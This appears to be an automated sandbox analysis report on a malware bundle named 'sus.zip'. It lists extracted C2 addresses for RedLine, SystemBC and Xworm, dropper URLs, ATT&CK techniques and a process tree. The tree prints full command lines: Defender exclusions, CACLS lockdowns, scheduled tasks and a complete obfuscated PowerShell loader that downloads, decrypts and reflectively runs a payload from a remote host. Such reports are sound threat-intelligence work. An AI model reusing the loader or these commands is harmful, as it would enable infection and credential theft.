gh0strat | 85c3c3e707c2567bca0e211c6ea81a11e6207ecdc51f49cfd21ebffe8bd503e7

Analysis

max time kernel
599s
max time network
603s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
10-05-2023 23:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sus.zip
Size

1KB
MD5

f8554227ffb4b19c58f38c459d8929cf
SHA1

684a2014816c1c20582e97ab69064f3d4348ba7e
SHA256

85c3c3e707c2567bca0e211c6ea81a11e6207ecdc51f49cfd21ebffe8bd503e7
SHA512

1ce8e237f7c6f2356554ca13dfaa16ec99baa0b3e12a7b17061f00409c28ba91494ffd9a37123a8d5dd0c913a54d689a7dd9915cc8f971264ea148d307bf15a5

Score

10^/10

gh0strat redline sectoprat systembc xworm 06.05 youtube cheat mixa evasion infostealer persistence ransomware rat trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Family

redline

Botnet

cheat

194.87.151.202:9578

Extracted

Family

systembc

148.251.236.201:443

Extracted

Family

redline

Botnet

06.05 youtube

23.226.129.17:20619

Attributes

auth_value
21645ccdf8187508e3b133b1d80a162e

Extracted

Family

xworm

62.171.178.45:7000

Mutex

tDbp1EmAkvM7wf10

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

redline

Botnet

mixa

185.161.248.75:4132

Attributes

auth_value
9d14534b25ac495ab25b59800acf3bb2

Signatures

Gh0st RAT payload 1 IoCs

Processes:

resource yara_rule

C:\dan.exe family_gh0strat
Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

resource	yara_rule
C:\dan.exe	family_gh0strat

RedLine payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\build.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\a\build.exe	family_redline
behavioral1/memory/920-263-0x0000000000940000-0x000000000095E000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\a\build_2.exe	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\build.exe	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\a\build.exe	family_sectoprat
behavioral1/memory/920-263-0x0000000000940000-0x000000000095E000-memory.dmp	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\a\build_2.exe	family_sectoprat

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

Processes:

money generator.exekoIWDRc.exeEngine.exekoIWDRc (2).exephoto_570.exev6437912.exev9458508.exea7571144.exei.exevbc.exebuild.exeConhost.exe

pid	process
4608	money generator.exe
2988	koIWDRc.exe
4400	Engine.exe
5088	koIWDRc (2).exe
4988	photo_570.exe
3336	v6437912.exe
3464	v9458508.exe
4828	a7571144.exe
3820	i.exe
512	vbc.exe
920	build.exe
1876	Conhost.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\SETUP_48483\Engine.exe	upx
C:\Users\Admin\AppData\Local\Temp\SETUP_48483\Engine.exe	upx
behavioral1/memory/4400-158-0x0000000000400000-0x0000000000557000-memory.dmp	upx
behavioral1/memory/4400-296-0x0000000000400000-0x0000000000557000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\SETUP_48487\Engine.exe	upx
C:\Users\Admin\AppData\Local\Temp\SETUP_48487\Engine.exe	upx
behavioral1/memory/1812-320-0x0000000000400000-0x0000000000557000-memory.dmp	upx
behavioral1/memory/1812-471-0x0000000000400000-0x0000000000557000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

photo_570.exev6437912.exev9458508.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	photo_570.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v6437912.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	v6437912.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v9458508.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	v9458508.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	photo_570.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
130	api.ipify.org
131	api.ipify.org
136	api.ipify.org
650	checkip.dyndns.org
670	ipinfo.io
905	ip-api.com
151	api.ipify.org
156	api.ipify.org
211	api.ipify.org

Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5148 sc.exe
8028 sc.exe
7744 sc.exe
7572 sc.exe
2944 sc.exe
9428 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5148	sc.exe
8028	sc.exe
7744	sc.exe
7572	sc.exe
2944	sc.exe
9428	sc.exe

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3264	1876	WerFault.exe	yfpqyf6z34gx4.exe
5636	4312	WerFault.exe	aaaa.exe
5884	4980	WerFault.exe	forscan.exe
6124	1348	WerFault.exe	Firefox.exe
5920	5652	WerFault.exe	ghjk.exe
3668	5040	WerFault.exe	ghjkl.exe
5944	4020	WerFault.exe	certreq.exe
5536	1780	WerFault.exe	setup.exe
1216	1780	WerFault.exe	setup.exe
5380	1780	WerFault.exe	setup.exe
5496	1780	WerFault.exe	setup.exe
4500	1780	WerFault.exe	setup.exe
6568	1780	WerFault.exe	setup.exe
9296	3556	WerFault.exe	explorer.exe
68	9948	WerFault.exe	Prynt_Stealer_5.6.exe
5776	9612	WerFault.exe	hastly.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

9412 schtasks.exe
5788 schtasks.exe
5076 schtasks.exe
5012 schtasks.exe
4556 schtasks.exe
8764 schtasks.exe
7436 schtasks.exe
8048 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7768 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXE

pid process

4652 NETSTAT.EXE
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4860 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3892 taskkill.exe
9168 taskkill.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

8436 reg.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

2744 PING.EXE
952 PING.EXE
7864 PING.EXE
9000 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

a7571144.exe

pid process

4828 a7571144.exe
4828 a7571144.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

money generator.exea7571144.exebuild.exe

description pid process

Token: SeDebugPrivilege 4608 money generator.exe
Token: SeDebugPrivilege 4828 a7571144.exe
Token: SeDebugPrivilege 920 build.exe

pid	process
9412	schtasks.exe
5788	schtasks.exe
5076	schtasks.exe
5012	schtasks.exe
4556	schtasks.exe
8764	schtasks.exe
7436	schtasks.exe
8048	schtasks.exe

pid	process
7768	timeout.exe

pid	process
4652	NETSTAT.EXE

pid	process
4860	vssadmin.exe

pid	process
3892	taskkill.exe
9168	taskkill.exe

pid	process
8436	reg.exe

pid	process
2744	PING.EXE
952	PING.EXE
7864	PING.EXE
9000	PING.EXE

pid	process
4828	a7571144.exe
4828	a7571144.exe

description	pid	process
Token: SeDebugPrivilege	4608	money generator.exe
Token: SeDebugPrivilege	4828	a7571144.exe
Token: SeDebugPrivilege	920	build.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

cmd.execsc.exemoney generator.exekoIWDRc.exeEngine.execmd.exephoto_570.exev6437912.exev9458508.execmd.exe

description	pid	process	target process
PID 4136 wrote to memory of 3540	4136	cmd.exe	csc.exe
PID 4136 wrote to memory of 3540	4136	cmd.exe	csc.exe
PID 4136 wrote to memory of 3540	4136	cmd.exe	csc.exe
PID 3540 wrote to memory of 3460	3540	csc.exe	cvtres.exe
PID 3540 wrote to memory of 3460	3540	csc.exe	cvtres.exe
PID 3540 wrote to memory of 3460	3540	csc.exe	cvtres.exe
PID 4608 wrote to memory of 2988	4608	money generator.exe	koIWDRc.exe
PID 4608 wrote to memory of 2988	4608	money generator.exe	koIWDRc.exe
PID 4608 wrote to memory of 2988	4608	money generator.exe	koIWDRc.exe
PID 2988 wrote to memory of 4400	2988	koIWDRc.exe	Engine.exe
PID 2988 wrote to memory of 4400	2988	koIWDRc.exe	Engine.exe
PID 2988 wrote to memory of 4400	2988	koIWDRc.exe	Engine.exe
PID 4400 wrote to memory of 1584	4400	Engine.exe	cmd.exe
PID 4400 wrote to memory of 1584	4400	Engine.exe	cmd.exe
PID 4400 wrote to memory of 1584	4400	Engine.exe	cmd.exe
PID 4608 wrote to memory of 5088	4608	money generator.exe	koIWDRc (2).exe
PID 4608 wrote to memory of 5088	4608	money generator.exe	koIWDRc (2).exe
PID 4608 wrote to memory of 5088	4608	money generator.exe	koIWDRc (2).exe
PID 1584 wrote to memory of 5068	1584	cmd.exe	cmd.exe
PID 1584 wrote to memory of 5068	1584	cmd.exe	cmd.exe
PID 1584 wrote to memory of 5068	1584	cmd.exe	cmd.exe
PID 4608 wrote to memory of 4988	4608	money generator.exe	photo_570.exe
PID 4608 wrote to memory of 4988	4608	money generator.exe	photo_570.exe
PID 4608 wrote to memory of 4988	4608	money generator.exe	photo_570.exe
PID 4988 wrote to memory of 3336	4988	photo_570.exe	v6437912.exe
PID 4988 wrote to memory of 3336	4988	photo_570.exe	v6437912.exe
PID 4988 wrote to memory of 3336	4988	photo_570.exe	v6437912.exe
PID 3336 wrote to memory of 3464	3336	v6437912.exe	v9458508.exe
PID 3336 wrote to memory of 3464	3336	v6437912.exe	v9458508.exe
PID 3336 wrote to memory of 3464	3336	v6437912.exe	v9458508.exe
PID 3464 wrote to memory of 4828	3464	v9458508.exe	a7571144.exe
PID 3464 wrote to memory of 4828	3464	v9458508.exe	a7571144.exe
PID 3464 wrote to memory of 4828	3464	v9458508.exe	a7571144.exe
PID 4608 wrote to memory of 3820	4608	money generator.exe	i.exe
PID 4608 wrote to memory of 3820	4608	money generator.exe	i.exe
PID 4608 wrote to memory of 3820	4608	money generator.exe	i.exe
PID 4608 wrote to memory of 512	4608	money generator.exe	vbc.exe
PID 4608 wrote to memory of 512	4608	money generator.exe	vbc.exe
PID 4608 wrote to memory of 512	4608	money generator.exe	vbc.exe
PID 4608 wrote to memory of 920	4608	money generator.exe	build.exe
PID 4608 wrote to memory of 920	4608	money generator.exe	build.exe
PID 4608 wrote to memory of 920	4608	money generator.exe	build.exe
PID 4608 wrote to memory of 1876	4608	money generator.exe	Conhost.exe
PID 4608 wrote to memory of 1876	4608	money generator.exe	Conhost.exe
PID 4608 wrote to memory of 1876	4608	money generator.exe	Conhost.exe
PID 5068 wrote to memory of 1572	5068	cmd.exe	powershell.exe
PID 5068 wrote to memory of 1572	5068	cmd.exe	powershell.exe
PID 5068 wrote to memory of 1572	5068	cmd.exe	powershell.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\sus.zip
1⤵
PID:2456

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\compile.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "money generator.txt"
2⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES76A7.tmp" "c:\Users\Admin\Desktop\CSC9050D60F337D4F77A68697574088BF29.TMP"
3⤵
PID:3460

C:\Users\Admin\Desktop\money generator.exe
"C:\Users\Admin\Desktop\money generator.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4608

C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe
"C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2988

C:\Users\Admin\AppData\Local\Temp\SETUP_48483\Engine.exe
C:\Users\Admin\AppData\Local\Temp\SETUP_48483\Engine.exe /TH_ID=_3144 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd < Lat
4⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell get-process avastui
6⤵
PID:1572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell get-process avgui
6⤵
PID:5356

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^tapeRushTowersComplexOtherCasinosNissanStockingsMongoliaReadingsFiberSandyDeliveredWorshipAfraid$" Liquid
6⤵
PID:1216

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 8
6⤵
- Runs ping.exe
PID:7864

C:\Users\Admin\AppData\Local\Temp\a\koIWDRc (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\koIWDRc (2).exe"
2⤵
- Executes dropped EXE
PID:5088

C:\Users\Admin\AppData\Local\Temp\SETUP_48487\Engine.exe
C:\Users\Admin\AppData\Local\Temp\SETUP_48487\Engine.exe /TH_ID=_4220 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\koIWDRc (2).exe"
3⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd < Lat
4⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\a\photo_570.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo_570.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4988

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v6437912.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v6437912.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3336

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9458508.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v9458508.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3464

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a7571144.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a7571144.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b6098938.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b6098938.exe
5⤵
PID:988

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c1152718.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c1152718.exe
4⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe"
5⤵
PID:5460

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe" /F
6⤵
- Creates scheduled task(s)
PID:5788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\c3912af058" /P "Admin:N"&&CACLS "..\c3912af058" /P "Admin:R" /E&&Exit
6⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:4496

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
7⤵
PID:3380

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
7⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:6096

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:N"
7⤵
PID:4000

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c3912af058" /P "Admin:R" /E
7⤵
PID:5536

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
6⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d0228364.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d0228364.exe
3⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\a\i.exe
"C:\Users\Admin\AppData\Local\Temp\a\i.exe"
2⤵
- Executes dropped EXE
PID:3820

C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
2⤵
- Executes dropped EXE
PID:512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\a\build.exe
"C:\Users\Admin\AppData\Local\Temp\a\build.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Users\Admin\AppData\Local\Temp\a\yfpqyf6z34gx4.exe
"C:\Users\Admin\AppData\Local\Temp\a\yfpqyf6z34gx4.exe"
2⤵
PID:1876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 148
3⤵
- Program crash
PID:3264

C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe
"C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe"
2⤵
PID:3640

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
4⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
5⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe"
4⤵
PID:3492

C:\Program Files\CCleaner\CCleaner64.exe
"C:\Program Files\CCleaner\CCleaner64.exe" /createSkipUAC
5⤵
PID:7688

C:\Program Files\CCleaner\CCUpdate.exe
"C:\Program Files\CCleaner\CCUpdate.exe" /reg
5⤵
PID:3456

C:\Program Files\CCleaner\CCUpdate.exe
CCUpdate.exe /emupdater /applydll "C:\Program Files\CCleaner\Setup\09c5d087-16f5-42cc-8542-04543f0584d4.dll"
6⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\a\aaaa.exe
"C:\Users\Admin\AppData\Local\Temp\a\aaaa.exe"
2⤵
PID:4312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 504
3⤵
- Program crash
PID:5636

C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe
"C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe"
2⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
2⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
3⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe"
2⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe"
3⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe"
2⤵
PID:4112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\vbc (4).exe"
3⤵
PID:5212

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBjeTclr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp188F.tmp"
3⤵
- Creates scheduled task(s)
PID:5012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\yBjeTclr.exe"
3⤵
PID:3572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:5280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:3336

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
"C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe"
2⤵
PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $typiconBooties = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $elidesDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDU5MzQ=')); $agentsTypicon = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('M2EyNWE=')); $elidesBooties = new-object System.Net.Sockets.TcpClient; $elidesBooties.Connect($typiconBooties, [int]$elidesDiggers); $moniasBecram = $elidesBooties.GetStream(); $elidesBooties.SendTimeout = 300000; $elidesBooties.ReceiveTimeout = 300000; $lingasElides = [System.Text.StringBuilder]::new(); $lingasElides.AppendLine('GET /' + $agentsTypicon); $lingasElides.AppendLine('Host: ' + $typiconBooties); $lingasElides.AppendLine(); $bootiesMonias = [System.Text.Encoding]::ASCII.GetBytes($lingasElides.ToString()); $moniasBecram.Write($bootiesMonias, 0, $bootiesMonias.Length); $moniasAgents = New-Object System.IO.MemoryStream; $moniasBecram.CopyTo($moniasAgents); $moniasBecram.Dispose(); $elidesBooties.Dispose(); $moniasAgents.Position = 0; $bootiesDiggers = $moniasAgents.ToArray(); $moniasAgents.Dispose(); $lingasAgents = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers).IndexOf('`r`n`r`n')+1; $lingasTypicon = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers[$lingasAgents..($bootiesDiggers.Length-1)]); $lingasTypicon = [System.Convert]::FromBase64String($lingasTypicon); $diggersCuittle = New-Object System.Security.Cryptography.AesManaged; $diggersCuittle.Mode = [System.Security.Cryptography.CipherMode]::CBC; $diggersCuittle.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $diggersCuittle.Key = [System.Convert]::FromBase64String('bTBxHoHlsFE1FusIuQOatttX0kgSSC4OKDkQ+IjagWQ='); $diggersCuittle.IV = [System.Convert]::FromBase64String('VB4EnrJD2qF3uAbX2nckFA=='); $typiconMonias = $diggersCuittle.CreateDecryptor(); $lingasTypicon = $typiconMonias.TransformFinalBlock($lingasTypicon, 0, $lingasTypicon.Length); $typiconMonias.Dispose(); $diggersCuittle.Dispose(); $agentsBecram = New-Object System.IO.MemoryStream(, $lingasTypicon); $cristiDiggers = New-Object System.IO.MemoryStream; $diggersMonias = New-Object System.IO.Compression.GZipStream($agentsBecram, [IO.Compression.CompressionMode]::Decompress); $diggersMonias.CopyTo($cristiDiggers); $lingasTypicon = $cristiDiggers.ToArray(); $agentsBooties = [System.Reflection.Assembly]::Load($lingasTypicon); $moniasDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZmlzdHVjYUZyYWdoYW4=')); $elidesMonias = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGluZ2FzQ3VpdHRsZQ==')); $bootiesAgents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ym9vdGllc0VsaWRlcw==')); $bootiesCristi = $agentsBooties.GetType($moniasDiggers + '.' + $elidesMonias); $elidesLingas = $bootiesCristi.GetMethod($bootiesAgents); $elidesLingas.Invoke($cuittleBooties, (, [string[]] ('C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe'))); #($cuittleBooties, $cuittleBooties);
3⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
C:\Users\Admin\AppData\Local\Temp\a\originalbuild.exe
4⤵
PID:5892

C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe
"C:\Users\Admin\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe"
5⤵
PID:5648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
